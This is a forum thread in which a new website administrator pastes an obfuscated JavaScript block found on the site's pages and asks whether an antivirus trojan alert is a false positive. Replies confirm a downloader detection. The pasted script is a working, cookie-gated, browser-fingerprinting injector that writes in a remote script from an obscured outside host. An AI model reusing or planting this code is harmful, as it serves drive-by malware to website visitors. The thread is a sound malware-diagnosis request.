JS:Includer-BHW[Trj] / Possible false positive?

Hello,

I am the site administrator/content manager for http://socialism.com

We have previously received warnings from Bing that our website contained malicious JavaScript and references to Malware networks, but since I was unable to find these specific instances, I assumed Bing was being overly cautious. Furthermore, Google has never given us such warnings:

http://www.google.com/safebrowsing/diagnostic?site=socialism.com

I have run our site through Securi SiteCheck, Wepawet, Zulu Risk Scanner, and VirusTotal. All but one say our site is clean or benign, with Wepawet claiming that our website may be suspicious but unable to point to anything in particular.

https://www.virustotal.com/en-gb/url/73ede2899468828ecb7bf4e43c7172780171a9d03b035e5f73d01928e3d56fe5/analysis/1417815619/

http://zulu.zscaler.com/submission/show/9c333b21a4f3b6a9531753d912caefb8-1417810824

http://wepawet.iseclab.org/view.php?hash=69eb6a6c79d3099f31a9f28e9540811c&t=1417810667&type=js#sec_deobfuscation

Today, however, one of our users received this message while trying to access our site:

http://i.imgur.com/LivZV6F.jpg

Is this a false positive?

Many (all?) of the pages on our site do contain a block of obfuscated JavaScript that I have been unable to identify.


var _0x45af = ["\x67\x65\x74\x54\x69\x6D\x65", "\x73\x65\x74\x54\x69\x6D\x65", 
"\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D", "\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67", 
"", "\x63\x6F\x6F\x6B\x69\x65", "\x3D", "\x3B\x20\x70\x61\x74\x68\x3D\x2F", "\x3B", 
"\x73\x70\x6C\x69\x74", "\x6C\x65\x6E\x67\x74\x68", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", 
"\x63\x68\x61\x72\x41\x74", "\x20", "\x69\x6E\x64\x65\x78\x4F\x66", 
"\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x61\x64\x66\x5F\x70\x72\x6F\x64\x73", 
"\x65", "\x3C", "\x6F\x72\x67", "\x6A\x73", "\x74", "\x44\x61\x74\x61", "\x63\x64", "\x6E", 
"\x73\x72\x63", "\x3E", "\x72\x74", "\x68\x74\x74\x70", "\x69\x70", "\x61\x64\x76", 
"\x73\x63\x72", "\x69\x61", "\x6D\x65\x64", "\x6D\x61\x74\x63\x68", 
"\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x72\x65\x66\x65\x72\x72\x65\x72", "\x3D\x22", 
"\x3A\x2F\x2F", "\x2E", "\x2F\x67\x65\x74", "\x3F", "\x22", "\x2F", "\x77\x72\x69\x74\x65", 
"\x6C\x69\x6E\x6B\x65\x64"];
function crCx(_0x9b9cx2, _0x9b9cx3, _0x9b9cx4){
if (_0x9b9cx4){
  var _0x9b9cx5 = new Date();
  _0x9b9cx5[_0x45af[1]](_0x9b9cx5[_0x45af[0]]() + (_0x9b9cx4 * 24 * 60 * 60 * 1000));
  var _0x9b9cx6 = _0x45af[2] + _0x9b9cx5[_0x45af[3]]()
}
else {
  var _0x9b9cx6 = _0x45af[4]
}
;
document[_0x45af[5]] = _0x9b9cx2 + _0x45af[6] + _0x9b9cx3 + _0x9b9cx6 + _0x45af[7]
}
;
function rdCx(_0x9b9cx2){
var _0x9b9cx8 = _0x9b9cx2 + _0x45af[6];
var _0x9b9cx9 = document[_0x45af[5]][_0x45af[9]](_0x45af[8]);
for (var _0x9b9cxa = 0; _0x9b9cxa < _0x9b9cx9[_0x45af[10]];
_0x9b9cxa ++ ){
  var _0x9b9cxb = _0x9b9cx9[_0x9b9cxa];
  while (_0x9b9cxb[_0x45af[12]](0) == _0x45af[13]){
    _0x9b9cxb = _0x9b9cxb[_0x45af[11]](1, _0x9b9cxb[_0x45af[10]])
  }
  ;
  if (_0x9b9cxb[_0x45af[14]](_0x9b9cx8) == 0){
    return _0x9b9cxb[_0x45af[11]](_0x9b9cx8[_0x45af[10]], _0x9b9cxb[_0x45af[10]])
  }
}
;
return null
}
;
var rdscx = Math[_0x45af[16]](Math[_0x45af[15]]() * 10000);
var crUnqz = rdCx(_0x45af[17]);
var vbzl = _0x45af[18];
var vbza = _0x45af[19];
var vbzv = _0x45af[20];
var vbzn = _0x45af[21];
var vbzf = _0x45af[22];
var vbzb = _0x45af[23];
var vbzh = _0x45af[24];
var vbzj = _0x45af[25];
var vbzg = _0x45af[26];
var vbzq = _0x45af[27];
var vbzz = _0x45af[28];
var vbzm = _0x45af[29];
var vbzd = _0x45af[30];
var vbzk = _0x45af[31];
var vbzs = _0x45af[32];
var vbzc = _0x45af[33];
var vbzx = _0x45af[34];
if (crUnqz == null){
if ((navigator[_0x45af[36]][_0x45af[35]](/MSIE/i) || navigator[_0x45af[36]][_0x45af[35]](
/Trident/i) || navigator[_0x45af[36]][_0x45af[35]](/Firefox/i))){
  if ((!navigator[_0x45af[36]][_0x45af[35]](/Linux/i) ||! navigator[_0x45af[36]][_0x45af[
  35]](/Apple/i) ||! navigator[_0x45af[36]][_0x45af[35]](/Chrome/i) ||! navigator[_0x45af[
  36]][_0x45af[35]](/Crawler/i) ||! navigator[_0x45af[36]][_0x45af[35]](/bot/i) ||! 
  navigator[_0x45af[36]][_0x45af[35]](/Google/i) ||! navigator[_0x45af[36]][_0x45af[35]](
  /Yahoo/i) ||! navigator[_0x45af[36]][_0x45af[35]](/Python/i))){
    if ((!document[_0x45af[37]][_0x45af[35]](/cache/i) ||! document[_0x45af[37]][_0x45af[
    35]](/inurl/i))){
      document[_0x45af[45]](_0x45af[4] + vbza + _0x45af[4] + vbzs + _0x45af[4] + vbzd + 
      _0x45af[4] + vbzf + _0x45af[13] + vbzg + _0x45af[38] + vbzm + _0x45af[39] + vbzh + 
      _0x45af[4] + vbzj + _0x45af[40] + vbzk + _0x45af[4] + vbzl + _0x45af[4] + vbzz + 
      _0x45af[4] + vbzx + _0x45af[4] + vbzc + _0x45af[40] + vbzv + _0x45af[41] + vbzb + 
      _0x45af[40] + vbzn + _0x45af[42] + rdscx + _0x45af[43] + vbzq + _0x45af[4] + vbza + 
      _0x45af[44] + vbzs + _0x45af[4] + vbzd + _0x45af[4] + vbzf + _0x45af[4] + vbzq + 
      _0x45af[4]);
      crCx(_0x45af[17], _0x45af[46], 3)
    }
  }
}
}
;

Is this code causing a drive-by download/Trojan? Or is it a script to determine a User Agent?

I should add that I have only been working here for about a month, and I don’t know as much as I should in terms of what was present before I took over for the person before me.

VirusTotal
https://www.virustotal.com/en/file/ba2a253e09f5e4e214ef11cfb00b392159a4315fa4c2e5161b867e657dffdcdf/analysis/

code sample you posted is not detected
https://www.virustotal.com/nb/file/84b45848a19e7fe0dacdd8e765ef03fbf4362e2a2e8eaa5372c29bff94c4905e/analysis/1417818258/

IP history https://www.virustotal.com/nb/ip-address/216.113.194.164/information/
as you there are several domains using same IP and sevral are/have been blacklisted … click more button under evry list

Detection is correct, confirmed by Norman/BlueCoat

socialism.com/[b]drupal-6.8[/b] - DLoader.ATMHU

Unmaskparasites http://www.UnmaskParasites.com/security-report/?page=www.socialism.com/drupal-6.8/